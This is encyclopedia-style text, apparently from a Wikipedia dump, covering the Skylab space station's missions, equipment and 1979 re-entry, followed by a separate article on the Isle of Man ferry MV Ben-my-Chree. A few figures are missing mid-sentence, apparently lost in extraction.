Skylab was launched on May 14, 1973, by the modified Saturn V. The launch is sometimes referred to as Skylab 1. Severe damage was sustained during launch and deployment, including the loss of the station's micrometeoroid shield/sun shade and one of its main solar panels. Debris from the lost micrometeoroid shield further complicated matters by becoming tangled in the remaining solar panel, preventing its full deployment and thus leaving the station with a huge power deficit.
Immediately following Skylab's launch, Pad 39A at Kennedy Space Center was deactivated, and construction proceeded to modify it for the Space Shuttle program, originally targeting a maiden launch in March 1979. The crewed missions to Skylab would occur using a Saturn IB rocket from Launch Pad 39B.
Skylab 1 was the last uncrewed launch from LC-39A until February 19, 2017, when SpaceX CRS-10 was launched from there.
Crewed missions
Three crewed missions, designated Skylab 2, Skylab 3, and Skylab 4, were made to Skylab in the Apollo command and service modules. The first crewed mission, Skylab 2, launched on May 25, 1973, atop a Saturn IB and involved extensive repairs to the station. The crew deployed a parasol-like sunshade through a small instrument port from the inside of the station, bringing station temperatures down to acceptable levels and preventing overheating that would have melted the plastic insulation inside the station and released poisonous gases. This solution was designed by NASA's "Mr. Fix It" Jack Kinzler, who won the NASA Distinguished Service Medal for his efforts. The crew conducted further repairs via two spacewalks (extravehicular activity or EVA). The crew stayed in orbit with Skylab for 28 days. Two additional missions followed, with the launch dates of July 28, 1973, (Skylab 3) and November 16, 1973, (Skylab 4), and mission durations of 59 and 84 days, respectively. The last Skylab crew returned to Earth on February 8, 1974.
In addition to the three crewed missions, there was a rescue mission on standby that had a crew of two, but could take five back down.
Skylab 2: launched May 25, 1973
Skylab 3: launched July 28, 1973
Skylab 4: launched November 16, 1973
Skylab 5: cancelled
Skylab Rescue on standby
Also of note was the three-man crew of Skylab Medical Experiment Altitude Test (SMEAT), who spent 56 days in 1972 at low-pressure on Earth to evaluate medical experiment equipment. This was a spaceflight analog test in full gravity, but Skylab hardware was tested and medical knowledge was gained.
Orbital operations
Skylab orbited Earth 2,476 times during the 171 days and 13 hours of its occupation during the three crewed Skylab expeditions. Each of these extended the human record of 23 days for amount of time spent in space set by the Soviet Soyuz 11 crew aboard the space station Salyut 1 on June 30, 1971. Skylab 2 lasted 28 days, Skylab 3 56 days, and Skylab 4 84 days. Astronauts performed ten spacewalks, totaling 42 hours and 16 minutes. Skylab logged about 2,000 hours of scientific and medical experiments, 127,000 frames of film of the Sun and 46,000 of Earth. Solar experiments included photographs of eight solar flares, and produced valuable results that scientists stated would have been impossible to obtain with uncrewed spacecraft. The existence of the Sun's coronal holes was confirmed because of these efforts. Many of the experiments conducted investigated the astronauts' adaptation to extended periods of microgravity.
A typical day began at 6 a.m. Central Time Zone. Although the toilet was small and noisy, both veteran astronauts – who had endured earlier missions' rudimentary waste-collection systems – and rookies complimented it. The first crew enjoyed taking a shower once a week, but found drying themselves in weightlessness and vacuuming excess water difficult; later crews usually cleaned themselves daily with wet washcloths instead of using the shower. Astronauts also found that bending over in weightlessness to put on socks or tie shoelaces strained their stomach muscles.
Breakfast began at 7 a.m. Astronauts usually stood to eat, as sitting in microgravity also strained their stomach muscles. They reported that their food – although greatly improved from Apollo – was bland and repetitive, and weightlessness caused utensils, food containers, and bits of food to float away; also, gas in their drinking water contributed to flatulence. After breakfast and preparation for lunch, experiments, tests and repairs of spacecraft systems and, if possible, 90 minutes of physical exercise followed; the station had a bicycle and other equipment, and astronauts could jog around the water tank. After dinner, which was scheduled for 6 pm, crews performed household chores and prepared for the next day's experiments. Following lengthy daily instructions (some of which were up to 15 meters long) sent via teleprinter, the crews were often busy enough to postpone sleep. The station offered what a later study called "a highly satisfactory living and working environment for crews", with enough room for personal privacy. Although it had a dart set, playing cards, and other recreational equipment in addition to books and music players, the window with its view of Earth became the most popular way to relax in orbit.
Experiments
Prior to departure about 80 experiments were named, although they are also described as "almost 300 separate investigations".
Experiments were divided into six broad categories:
Life science – human physiology, biomedical research; circadian rhythms (mice, gnats)
Solar physics and astronomy – sun observations (eight telescopes and separate instrumentation); Comet Kohoutek (Skylab 4); stellar observations; space physics
Earth resources – mineral resources; geology; hurricanes; land and vegetation patterns
Material science – welding, brazing, metal melting; crystal growth; water / fluid dynamics
Student research – 19 different student proposals. Several experiments were commended by the crew, including a dexterity experiment and a test of web-spinning by spiders in low gravity.
Other – human adaptability, ability to work, dexterity; habitat design/operations.
Because the solar scientific airlock – one of two research airlocks – was unexpectedly occupied by the "parasol" that replaced the missing meteorite shield, a few experiments were instead installed outside with the telescopes during spacewalks or shifted to the Earth-facing scientific airlock.
Skylab 2 spent less time than planned on most experiments due to station repairs. On the other hand, Skylab 3 and Skylab 4 far exceeded the initial experiment plans, once the crews adjusted to the environment and established comfortable working relationships with ground control.
The figure (below) lists an overview of most major experiments. Skylab 4 carried out several more experiments, such as to observe Comet Kohoutek.
Nobel Prize
Riccardo Giacconi shared the 2002 Nobel Prize in Physics for his study of X-ray astronomy, including the study of emissions from the Sun onboard Skylab, contributing to the birth of X-ray astronomy.
Example
Film vaults and window radiation shield
Skylab had certain features to protect vulnerable technology from radiation. The window was vulnerable to darkening, and this darkening could affect experiment S190. As a result, a light shield that could be open or shut was designed and installed on Skylab. To protect a wide variety of films, used for a variety of experiments and for astronaut photography, there were five film vaults. There were four smaller film vaults in the Multiple Docking Adapter, mainly because the structure could not carry enough weight for a single larger film vault. The orbital workshop could handle a single larger safe, which is also more efficient for shielding. The large vault in the orbital workshop had an empty mass of 2398 lb (1088 kg). The four smaller vaults had combined mass of 1,545 lb. The primary construction material of all five safes was aluminum. When Skylab re-entered there was one 180 lb chunk of aluminum found that was thought to be a door to one of the film vaults. The big film vault was one of the heaviest single pieces of Skylab to re-enter Earth's atmosphere.
A later example of a radiation vault is the Juno Radiation Vault for the Juno Jupiter orbiter, launched in 2011, which was designed to protect much of the uncrewed spacecraft's electronics, using 1 cm thick walls of titanium.
The Skylab film vault was used for storing film from various sources including the Apollo Telescope Mount solar instruments. Six ATM experiments used film to record data, and over the course of the missions over 150,000 successful exposures were recorded. The film canister had to be manually retrieved on crewed spacewalks to the instruments during the missions. The film canisters were returned to Earth aboard the Apollo capsules when each mission ended, and were among the heaviest items that had to be returned at the end of each mission. The heaviest canisters weighed 40 kg and could hold up to 16,000 frames of film.
Gyroscopes
There were two types of gyroscopes on Skylab. Control-moment gyroscopes (CMG) could physically move the station, and rate gyroscopes measured the rate of rotation to find its orientation. The CMG helped provide the fine pointing needed by the Apollo Telescope Mount, and to resist various forces that can change the station's orientation.
Some of the forces acting on Skylab that the pointing system needed to resist:
Gravity gradient
Aerodynamic disturbance
Internal movements of crew.
Skylab was the first large spacecraft to use big gyroscopes, capable of controlling its attitude. The control could also be used to help point the instruments. The gyroscopes took about ten hours to get spun up if they were turned off. There was also a thruster system to control Skylab's attitude. There were 9 rate-gyroscope sensors, 3 for each axis. These were sensors that fed their output to the Skylab digital computer. Two of three were active and their input was averaged, while the third was a backup. From NASA SP-400 Skylab, Our First Space Station, "each Skylab control-moment gyroscope consisted of a motor-driven rotor, electronics assembly, and power inverter assembly. The 21-inch diameter rotor weighed and rotated at approximately 8950 revolutions per minute".
There were three control movement gyroscopes on Skylab, but only two were required to maintain pointing. The control and sensor gyroscopes were part of a system that help detect and control the orientation of the station in space. Other sensors that helped with this were a Sun tracker and a star tracker. The sensors fed data to the main computer, which could then use the control gyroscopes and or the thruster system to keep Skylab pointed as desired.
Shower
Skylab had a zero-gravity shower system in the work and experiment section of the Orbital Workshop designed and built at the Manned Spaceflight Center. It had a cylindrical curtain that went from floor to ceiling and a vacuum system to suck away water. The floor of the shower had foot restraints.
To bathe, the user coupled a pressurized bottle of warmed water to the shower's plumbing, then stepped inside and secured the curtain. A push-button shower nozzle was connected by a stiff hose to the top of the shower. The system was designed for about 6 pints (2.8 liters) of water per shower, the water being drawn from the personal hygiene water tank. The use of both the liquid soap and water was carefully planned out, with enough soap and warm water for one shower per week per person.
The first astronaut to use the space shower was Paul J. Weitz on Skylab 2, the first crewed mission. He said, "It took a fair amount longer to use than you might expect, but you come out smelling good". A Skylab shower took about two and a half hours, including the time to set up the shower and dissipate used water. The procedure for operating the shower was as follows:
Fill up the pressurized water bottle with hot water and attach it to the ceiling
Connect the hose and pull up the shower curtain
Spray down with water
Apply liquid soap and spray more water to rinse
Vacuum up all the fluids and stow items.
One of the big concerns with bathing in space was control of droplets of water so that they did not cause an electrical short by floating into the wrong area. The vacuum water system was thus integral to the shower. The vacuum fed to a centrifugal separator, filter, and collection bag to allow the system to vacuum up the fluids. Waste water was injected into a disposal bag which was in turn put in the waste tank. The material for the shower enclosure was fire-proof beta cloth wrapped around hoops of diameter; the top hoop was connected to the ceiling. The shower could be collapsed to the floor when not in use. Skylab also supplied astronauts with rayon terrycloth towels which had a color-coded stitching for each crew-member. There were 420 towels on board Skylab initially.
A simulated Skylab shower was also used during the 56-day SMEAT simulation; the crew used the shower after exercise and found it a positive experience.
Cameras and film
There was a variety of hand-held and fixed experiments that used various types of film. In addition to the instruments in the ATM solar observatory, 35 and 70 mm film cameras were carried on board. A TV camera was carried that recorded video electronically. These electronic signals could be recorded to magnetic tape or be transmitted to Earth by radio signal. The TV camera was not a digital camera of the type that became common in the later decades, although Skylab did have a digital computer using microchips on board.
It was determined that film would fog up to due to radiation over the course of the mission. To prevent this, film was stored in vaults.
Personal (hand-held) camera equipment:
Television camera
Westinghouse color
25–150 mm zoom
16 mm film camera (Maurer), called the 16 mm Data Acquisition Camera. The DAC was capable of very low frame rates, such as for engineering data films, and it had independent shutter speeds. It could be powered from a battery or from Skylab itself. It used interchangeable lenses, and various lens and also film types were used during the missions.
There were different options for frame rates: 2, 4, 6, 12 and 24 frames per second
Lenses available: 5, 10, 18, 25, 75, and 100 mm
Films used:
Ektachrome film
SO-368 film
SO-168 film
Film for the DAC was contained in DAC film magazines, which contained up to 140 feet (42.7 m) of film. At 24 frames per second this was enough for 4 minutes of filming, with progressively longer film times with lower frame rates such as 16 minutes at 6 frames per second. The film had to be loaded or unloaded from the DAC in a photographic dark room.
35 mm film cameras (Nikon)
There were 5 Nikon 35 mm film cameras on board, with 55 mm and 300 mm lenses.
They were specially modified Nikon F cameras
The cameras were capable of interchangeable lenses.
35mm films included:
Ektachrome
SO-368
SO-168
2485 type film
2443 type film
70 mm film camera (Hasselblad)
This had an electric data camera system with Reseau plate
Films included
70 mm Ektachrome
SO-368 film
Lenses: 70 mm lens, 100 mm lens.
Experiment S190B was the Actron Earth Terrain Camera.
The S190A was the Multispectral Photographic Camera:
This consisted of six 70 mm cameras
Each was an Itek 70 mm boresighted camera
Lenses were f/2.8 with a 21.2° field of view.
There was also a Polaroid SX-70 instant camera, and a pair of Leitz Trinovid 10 × 40 binoculars modified for use in space to aid in Earth observations.
The SX-70 was used to take pictures of the Extreme Ultraviolet monitor by Dr. Garriot, as the monitor provided a live video feed of the solar corona in ultraviolet light as observed by Skylab solar observatory instruments located in the Apollo Telescope Mount.
Computers
Skylab was controlled in part by a digital computer system, and one of its main jobs was to control the pointing of the station; pointing was especially important for its solar power collection and observatory functions. The computer consisted of two actual computers, a primary and a secondary. The system ran several thousand words of code, which was also backed up on the Memory Load Unit (MLU). The two computers were linked to each other and various input and output items by the workshop computer interface. Operations could be switched from the primary to the backup, which were the same design, either automatically if errors were detected, by the Skylab crew, or from the ground.
The Skylab computer was a space-hardened and customized version of the TC-1 computer, a version of the IBM System/4 Pi, itself based on the System 360 computer. The TC-1 had a 16,000-word memory based on ferrite memory cores, while the MLU was a read-only tape drive that contained a backup of the main computer programs. The tape drive would take 11 seconds to upload the backup of the software program to a main computer. The TC-1 used 16-bit words and the central processor came from the 4Pi computer. There was a 16k and an 8k version of the software program.
The computer had a mass of 100 pounds (45.4 kg), and consumed about ten percent of the station's electrical power.
Apollo Telescope Mount Digital Computer
Attitude and Pointing Control System (APCS)
Memory Load Unit (MLU).
After launch the computer is what the controllers on the ground communicated with to control the station's orientation. When the sun-shield was torn off the ground staff had to balance solar heating with electrical production. On March 6, 1978, the computer system was re-activated by NASA to control the re-entry.
The system had a user interface that consisted of a display, ten buttons, and a three-position switch. Because the numbers were in octal (base-8), it only had numbers zero to seven (8 keys), and the other two keys were enter and clear. The display could show minutes and seconds which would count down to orbital benchmarks, or it could display keystrokes when using the interface. The interface could be used to change the software program. The user interface was called the Digital Address System (DAS) and could send commands to the computer's command system. The command system could also get commands from the ground.
For personal computing needs Skylab crews were equipped with models of the then new hand-held electronic scientific calculator, which was used in place of slide-rules used on prior space missions as the primary personal computer. The model used was the Hewlett Packard HP 35. Some slide rules continued in use aboard Skylab, and a circular slide rule was at the workstation.
Plans for re-use after the last mission
The three crewed Skylab missions used only about 16.8 of the 24 man-months of oxygen, food, water, and other supplies stored aboard Skylab. A fourth crewed mission was under consideration, which would have used the launch vehicle kept on standby for the Skylab Rescue mission. This would have been a 20-day mission to boost Skylab to a higher altitude and do more scientific experiments. Another plan was to use a Teleoperator Retrieval System (TRS) launched aboard the Space Shuttle (then under development), to robotically re-boost the orbit. When Skylab 5 was cancelled, it was expected Skylab would stay in orbit until the 1980s, which was enough time to overlap with the beginning of Shuttle launches. Other options for launching TRS included the Titan III and Atlas-Agena. No option received the level of effort and funding needed for execution before Skylab's sooner-than-expected re-entry.
The Skylab 4 crew left a bag filled with supplies to welcome visitors, and left the hatch unlocked. Skylab's internal systems were evaluated and tested from the ground, and effort was put into plans for re-using it, as late as 1978. NASA discouraged any discussion of additional visits due to the station's age, but in 1977 and 1978, when the agency still believed the Space Shuttle would be ready by 1979, it completed two studies on reusing the station. By September 1978, the agency believed Skylab was safe for crews, with all major systems intact and operational. It still had 180 man-days of water and 420-man-days of oxygen, and astronauts could refill both; the station could hold up to about 600 to 700 man-days of drinkable water and 420 man-days of food. Before Skylab 4 left they did one more boost, running the Skylab thrusters for 3 minutes which added 11 km in height to its orbit. Skylab was left in a 433 by 455 km orbit on departure. At this time, the NASA-accepted estimate for its re-entry was nine years.
The studies cited several benefits from reusing Skylab, which one called a resource worth "hundreds of millions of dollars" with "unique habitability provisions for long duration space flight". Because no more operational Saturn V rockets were available after the Apollo program, four to five shuttle flights and extensive space architecture would have been needed to build another station as large as Skylab's volume. Its ample size – much greater than that of the shuttle alone, or even the shuttle plus Spacelab – was enough, with some modifications, for up to seven astronauts of both sexes, and experiments needing a long duration in space; even a movie projector for recreation was possible.
Proponents of Skylab's reuse also said repairing and upgrading Skylab would provide information on the results of long-duration exposure to space for future stations. The most serious issue for reactivation was attitude control, as one of the station's gyroscopes had failed and the attitude control system needed refueling; these issues would need EVA to fix or replace. The station had not been designed for extensive resupply. However, although it was originally planned that Skylab crews would only perform limited maintenance, they successfully made major repairs during EVA, such as the Skylab 2 crew's deployment of the solar panel and the Skylab 4 crew's repair of the primary coolant loop. The Skylab 2 crew fixed one item during EVA by, reportedly, "hit[ting] it with [a] hammer".
Some studies also said, beyond the opportunity for space construction and maintenance experience, reactivating the station would free up shuttle flights for other uses, and reduce the need to modify the shuttle for long-duration missions. Even if the station were not crewed again, went one argument, it might serve as an experimental platform.
Shuttle mission plans
The reactivation would likely have occurred in four phases:
An early Space Shuttle flight would have boosted Skylab to a higher orbit, adding five years of operational life. The shuttle might have pushed or towed the station, but attaching a space tug – the Teleoperator Retrieval System (TRS) – to the station would have been more likely, based on astronauts' training for the task. Martin Marietta won the contract for US$26 million to design the apparatus. TRS would contain about three tons of propellant. The remote-controlled booster had TV cameras and was designed for duties such as space construction and servicing and retrieving satellites the shuttle could not reach. After rescuing Skylab, the TRS would have remained in orbit for future use. Alternatively, it could have been used to de-orbit Skylab for a safe, controlled re-entry and destruction.
In two shuttle flights, Skylab would have been refurbished. In January 1982, the first mission would have attached a docking adapter and conducted repairs. In August 1983, a second crew would have replaced several system components.
In March 1984, shuttle crews would have attached a solar-powered Power Expansion Package, refurbished scientific equipment, and conducted 30- to 90-day missions using the Apollo Telescope Mount and the Earth resources experiments.
Over five years, Skylab would have been expanded to accommodate six to eight astronauts, with a new large docking/interface module, additional logistics modules, Spacelab modules and pallets, and an orbital vehicle space dock using the shuttle's external tank.
The first three phases would have required about US$60 million in 1980s dollars, not including launch costs. Other options for launching TRS were Titan III or Atlas-Agena.
After departure
After a boost of by Skylab 4's Apollo CSM before its departure in 1974, Skylab was left in a parking orbit of by that was expected to last until at least the early 1980s, based on estimates of the 11-year sunspot cycle that began in 1976. NASA had first considered the potential risks of a space station reentry in 1962, but decided not to incorporate a retrorocket system in Skylab due to cost and acceptable risk.
The spent 49-ton Saturn V S-II stage which had launched Skylab in 1973 remained in orbit for almost two years, and made a controlled reentry on January 11, 1975. The re-entry was mistimed however and deorbited slightly earlier in the orbit than planned.
Solar activity
British mathematician Desmond King-Hele of the Royal Aircraft Establishment (RAE) predicted in 1973 that Skylab would de-orbit and crash to Earth in 1979, sooner than NASA's forecast, because of increased solar activity. Greater-than-expected solar activity heated the outer layers of Earth's atmosphere and increased drag on Skylab. By late 1977, NORAD also forecast a reentry in mid-1979; a National Oceanic and Atmospheric Administration (NOAA) scientist criticized NASA for using an inaccurate model for the second most-intense sunspot cycle in a century, and for ignoring NOAA predictions published in 1976.
The reentry of the USSR's nuclear powered Cosmos 954 in January 1978, and the resulting radioactive debris fall in northern Canada, drew more attention to Skylab's orbit. Although Skylab did not contain radioactive materials, the State Department warned NASA about the potential diplomatic repercussions of station debris. Battelle Memorial Institute forecast that up to 25 tons of metal debris could land in 500 pieces over an area long and wide. The lead-lined film vault, for example, might land intact at 400 feet per second.
Ground controllers re-established contact with Skylab in March 1978 and recharged its batteries. Although NASA worked on plans to reboost Skylab with the Space Shuttle through 1978 and the TRS was almost complete, the agency gave up in December 1978 when it became clear that the shuttle would not be ready in time; its first flight, STS-1, did not occur until April 1981. Also rejected were proposals to launch the TRS using one or two uncrewed rockets or to attempt to destroy the station with missiles.
Re-entry and debris
Skylab's demise in 1979 was an international media event, with T-shirts and hats with bullseyes and "Skylab Repellent" with a money-back guarantee, wagering on the time and place of re-entry, and nightly news reports. The San Francisco Examiner offered a US$10,000 prize for the first piece of Skylab delivered to its offices; the competing San Francisco Chronicle offered US$200,000 if a subscriber suffered personal or property damage. A Nebraska neighborhood painted a target so that the station would have "something to aim for", a resident said.
A report commissioned by NASA calculated that the odds were 1 in 152 of debris hitting any human, and odds of 1 in 7 of debris hitting a city of 100,000 people or more. Special teams were readied to head to any country hit by debris. The event caused so much panic in the Philippines that President Ferdinand Marcos appeared on national television to reassure the public.
A week before re-entry, NASA forecast that it would occur between July 10 and 14, with the 12th the most likely date, and the Royal Aircraft Establishment (RAE) predicted the 14th. In the hours before the event, ground controllers adjusted Skylab's orientation to minimize the risk of re-entry on a populated area. They aimed the station at a spot south-southeast of Cape Town, South Africa, and re-entry began at approximately 16:37 UTC, July 11, 1979. The station did not burn up as fast as NASA expected. Debris landed about east of Perth, Western Australia due to a four-percent calculation error, and was found between Esperance, Western Australia and Rawlinna, from 31° to 34° S and 122° to 126° E, about 130–150 km (81–93 miles) radius around Balladonia, Western Australia. Residents and an airline pilot saw dozens of colorful flares as large pieces broke up in the atmosphere; the debris landed in an almost unpopulated area, but the sightings still caused NASA to fear human injury or property damage. The Shire of Esperance light-heartedly fined NASA A$400 for littering. (The fine was written off three months later, but was eventually paid on behalf of NASA in April 2009, after Scott Barley of Highway Radio raised the funds from his morning show listeners.)
Stan Thornton found 24 pieces of Skylab at his home in Esperance, and a Philadelphia businessman flew him, his parents, and his girlfriend to San Francisco where he collected the Examiner prize and another US$1,000 from the businessman. The Miss Universe 1979 pageant was scheduled for July 20, 1979 in Perth, and a large piece of Skylab debris was displayed on the stage. Analysis of the debris showed that the station had disintegrated above the Earth, much lower than expected.
After the demise of Skylab, NASA focused on the reusable Spacelab module, an orbital workshop that could be deployed with the Space Shuttle and returned to Earth. The next American major space station project was Space Station Freedom, which was merged into the International Space Station in 1993 and launched starting in 1998. Shuttle-Mir was another project and led to the US funding Spektr, Priroda, and the Mir Docking Module in the 1990s.
Launchers, rescue, and cancelled missions
Launchers
Launch vehicles:
SA-206 (Skylab 2)
SA-207 (Skylab 3)
SA-208 (Skylab 4)
SA-209 (Skylab Rescue, not launched)
Skylab Rescue
There was a Skylab Rescue mission assembled for the second crewed mission to Skylab, but it was not needed. Another rescue mission was assembled for the last Skylab and was also on standby for ASTP. That launch stack might have been used for Skylab 5 (which would have been the fourth crewed Skylab mission), but this was cancelled and the SA-209 Saturn IB rocket was put on display at NASA Kennedy Space Center.
Skylab 5
Skylab 5 would have been a short 20-day mission to conduct more scientific experiments and use the Apollo's Service Propulsion System engine to boost Skylab into a higher orbit. Vance Brand (commander), William B. Lenoir (science pilot), and Don Lind (pilot) would have been the crew for this mission, with Brand and Lind being the prime crew for the Skylab Rescue flights. Brand and Lind also trained for a mission that would have aimed Skylab for a controlled deorbit.
The mission would have launched in April 1974 and supported later use by the Space Shuttle by boosting the station to higher orbit.
Skylab B
In addition to the flown Skylab space station, a second flight-quality backup Skylab space station had been built during the program. NASA considered using it for a second station in May 1973 or later, to be called Skylab B (S-IVB 515), but decided against it. Launching another Skylab with another Saturn V rocket would have been very costly, and it was decided to spend this money on the development of the Space Shuttle instead. The backup is on display at the National Air and Space Museum in Washington, D.C.
Engineering mock-ups
A full-size training mock-up once used for astronaut training is located at the Lyndon B. Johnson Space Center visitor's center in Houston, Texas. Another full-size training mock-up is at the U.S. Space & Rocket Center in Huntsville, Alabama. Originally displayed indoors, it was subsequently stored outdoors for several years to make room for other exhibits. To mark the 40th anniversary of the Skylab program, the Orbital Workshop portion of the trainer was restored and moved into the Davidson Center in 2013. NASA transferred Skylab B (the backup Skylab) to the National Air and Space Museum in 1975. On display in the Museum's Space Hall since 1976, the orbital workshop has been slightly modified to permit viewers to walk through the living quarters.
Mission designations
The numerical identification of the crewed Skylab missions was the cause of some confusion. Originally, the uncrewed launch of Skylab and the three crewed missions to the station were numbered SL-1 through SL-4. During the preparations for the crewed missions, some documentation was created with a different scheme – SLM-1 through SLM-3 – for those missions only. William Pogue credits Pete Conrad with asking the Skylab program director which scheme should be used for the mission patches, and the astronauts were told to use 1–2–3, not 2–3–4. By the time NASA administrators tried to reverse this decision, it was too late, as all the in-flight clothing had already been manufactured and shipped with the 1–2–3 mission patches.
NASA Astronaut Group 4 and NASA Astronaut Group 6 were scientists recruited as astronauts. They and the scientific community hoped to have two on each Skylab mission, but Deke Slayton, director of flight crew operations, insisted that two trained pilots fly on each.
SMEAT
The Skylab Medical Experiment Altitude Test or SMEAT was a 56-day (8-week) Earth analog Skylab test. The test had a low-pressure high oxygen-percentage atmosphere but it operated under full gravity, as SMEAT was not in orbit. The test had a three-astronaut crew with Commander Robert Crippen, Science Pilot Karol J. Bobko, and Pilot William E. Thornton; there was a focus on medical studies and Thornton was an M.D. The crew lived and worked in the pressure chamber, converted to be like Skylab, from July 26 to September 20, 1972.
Program cost
From 1966 to 1974, the Skylab program cost a total of US$2.2 billion, (equivalent to $ billion in ). As its three three-person crews spent 510 total man-days in space, each man-day cost approximately US$20 million, compared to US$7.5 million for the International Space Station.
Summary
Depictions in film
The 1969 film Marooned depicts three astronauts stranded in orbit after visiting the unnamed Apollo Applications Program space lab.
The 1974 episode of The Six Million Dollar Man "Rescue of Athena One" has Farrah Fawcett's Major Woods character using Skylab as an emergency shelter after experiencing an event while piloting a space mission, with Lee Majors's Steve Austin character coming to Skylab on the rescue rocket mission.
David Wain's 2001 comedy film Wet Hot American Summer depicts a fictionalized version of Skylab's re-entry, in which debris from the station is expected to land on a summer camp in Maine.
The documentary Searching for Skylab was released online in March 2019. It was written and directed by Dwight Steven-Boniecki and was partly crowdfunded.
The alternate history Apple TV+ original series For All Mankind depicts the use of the space station in the first episode of the second season, surviving to the 1980s and coexisting with the Space Shuttle program in the alternate timeline.
In the 2011 film Skylab, a family gathers in France and waits for the station to fall out of orbit. It was directed by Julie Delpy.
The 2021 Indian film Skylab depicts fictitious incidents in a Telangana village preceding the disintegration of the space station.
Gallery
See also
Timeline of longest spaceflights
Skylab II (proposed space station)
"Spacelab", a 1978 song by Kraftwerk
Solar panels on spacecraft
References
Footnotes
Works cited
Further reading
SP-402 A New Sun: The Solar Results from Skylab
Skylab Mission Evaluation – NASA report (PDF format)
Skylab Reactivation Mission Report 1980 – NASA report (PDF format)
External links
Voices of Oklahoma interview with William Pogue. First person interview conducted with William Pogue on 8 August 2012. Original audio and transcript archived with Voices of Oklahoma oral history project.
NASA
NASA History Series Publications (many of which are on-line)
SP-4011 Skylab, a Chronology (1977) 1
SP-401 Skylab, Classroom in Space (1977)
SP-399 Skylab EREP Investigations Summary (1978)
SP-402 A New Sun: Solar Results from Skylab (1979)
SP-404 Skylab's Skylab's Astronomy and Space Sciences (1979)
NASA Educational Film
Airlock Module under construction (1971) (Medium)
Airlock and Docking Module together (1972) (Medium)
Skylab Crew Quarters Illustration
Apollo (in foreground) and Skylab space food (M487)
Third party
Skylab Collection, The University of Alabama in Huntsville Archives and Special Collections
Leland F. Belew Collection, The University of Alabama in Huntsville Archives and Special Collections Files of Leland Belew, Skylab's project manager.
eoPortal: Skylab
Historic Spacecraft: Skylab
Skylab reboost module
Skylab Reentry (Chapter 9 of SP-4208)
Skylab cutaway drawing from Encyclopædia Britannica
Cutaway line drawing of Skylab
Skylab "Christmas tree"
Satellites formerly orbiting Earth
Extravehicular activity
Crewed spacecraft
NASA space stations
Space stations
Spacecraft launched in 1973
Spacecraft which reentered in 1979
Spacecraft launched by Saturn rockets
Wernher von Braun
|
14382750
|
https://en.wikipedia.org/wiki/MS%20Ben-my-Chree
|
MS Ben-my-Chree
|
MV Ben-my-Chree is a Ro-Pax vessel which was launched and entered service in 1998. The flagship of the Isle of Man Steam Packet Company, it primarily operates on the Douglas to Heysham route. The Royal New Zealand Navy multi-role vessel , based on Ben-my-Chrees design, entered service in 2007.
History
Ben-my-Chree was ordered in 1997 by Sea Containers for the Isle of Man Steam Packet Company. Costing around £24 million, she was built by van der Giessen de Noord of the Netherlands and launched on 4 April 1998. The sixth vessel to carry the name, she is registered in Douglas, Isle of Man.
Ben-my-Chree entered service on 5 July 1998, Tynwald Day - the Isle of Man's national holiday. At a gross tonnage of around 12,000, she was the largest ship to enter service with the company. The vessel received criticism due to her low passenger capacity of 500 (carrying no more than 350 per sailing), and the fact she had no open deck for passengers. The company insisted this was a "comfort level" for the vessel's size.
In 2004, the vessel underwent a refit carried out by Cammell Laird to increase passenger capacity with the addition of a new passenger module. In 2014, Ben-my-Chree underwent a £1.6 million refit which included new LED lighting fitted to the lounge areas, refitted the crew rest area, this was also carried out by Cammell Laird.
Incidents
On 25 July 2008, Ben-my-Chree suffered a technical failure, with the Viking taking her Heysham sailing until she was repaired.
On 26 March 2010, Ben-my-Chree experienced unintended movement while berthed at Heysham Port, resulting in a walkway collapse, trapping eight people in the gangway compartment of the shore access structure; they were assisted in leaving by the fire service.
On the evening of 1 May 2013 when arriving in Douglas Harbour from Heysham, Ben-my-Chree struck part of the King Edward Pier linkspan. In the collision part of the ship was slightly damaged, meaning the evening departure to Heysham was delayed by two hours, with the Manannan arriving from Liverpool as replacement. The service arrived at Heysham only around thirty minutes late. Ben-my-Chree re-entered service the following day with a freight-only service to Heysham, and full service from that point onwards.
In December 2011, the Ben-my-Chree suffered a number of cancelled sailings due to high winds and a problem with a bow thruster that had been damaged in May that year. Arrangements to dry dock the ship in June and then in September had to be cancelled after the manufacturers, Wartsilla, failed to complete the necessary repairs. Chief executive of the Steam Packet Company wrote to the local newspaper, the Manx Independent to express the company's frustration at the ongoing problems.
On 12 February 2015, Ben-my-Chree lost control and collided with a fishing boat, while entering Douglas Harbour. The vessel's stern made contact with Battery Pier and a fishing boat at its mooring. It was found that the ship and the fishing boat only suffered superficial damage. The ship was checked by divers for signs of damage to the propellers and steering. It was then relocated to the Victoria Pier using a tug boat where passengers disembarked.
On 2 May 2015, the morning sailing from Douglas to Heysham and the afternoon return was cancelled. Ben-my-Chree was suffering from a "bow thruster... only operating on reduced power". On 16 May 2015, there was a suspected chimney stack lagging fire was detected on the 8.45am crossing from Douglas to Heysham. The sailing arrived in Heysham Port around 1 hour late and no passengers or crew were injured.
On 12 February 2017, the vessel made contact with the pier at Douglas whilst attempting to moor in high winds on arrival from Birkenhead. and were planned to take over the freight and passenger duties. On 9 April 2017, Ben-my-Chree suffered an engine failure after arriving at Heysham Port. As a result two return crossings were cancelled and the vessel limped back to Douglas on one engine without passengers.
Design and construction
Ben-my-Chree is a Ro-Pax ferry, largely designed to carry freight, with two vehicle decks (decks 3 and 5) and two passenger accommodation decks (7 and 8). There are 20 four-berth cabins and crew accommodation for 22. Her freight capacity is 200 vehicles (1235m).
A refit during her first winter improved passenger accommodation. Reclining chairs were added in the forward and aft lounges and partitions added between the restaurant and bar areas. In 2004, a major refit allowed her to carry a full capacity of 636 passengers. A new accommodation section containing the Legends café/bar, Niarbyl Quiet Lounge and toilets was added. The refit also created an outside deck space and modifications were made to the vessel's stern door. Another refit in April 2008 included a new livery and internal refit.
The Royal New Zealand Navy multi-role vessel , based on Ben-my-Chrees design, entered service in 2007.
Service
On 16 July 2018, Ben-my-Chree completed 20 years of Manx service. She operates primarily on the Douglas to Heysham route, with occasional services to Belfast.
Future replacement
In March 2013, the chairman of local group TravelWatch, Brendan O’Friel, said "The Ben is currently mid-way through her life and she is starting now to develop problems of one sort or another. She is not as reliable as she was. A replacement would take two years to build and we are keen to see plans go ahead." In Issue 17 of the company newsletter, Steam Packet Times, Chief Executive Mark Woodward explained that "Now that the refinancing has been completed we have begun the process of assessing the longer term - it is clear that the most significant investment in the coming years will be replacement vessels for Ben-my-Chree and Manannan."
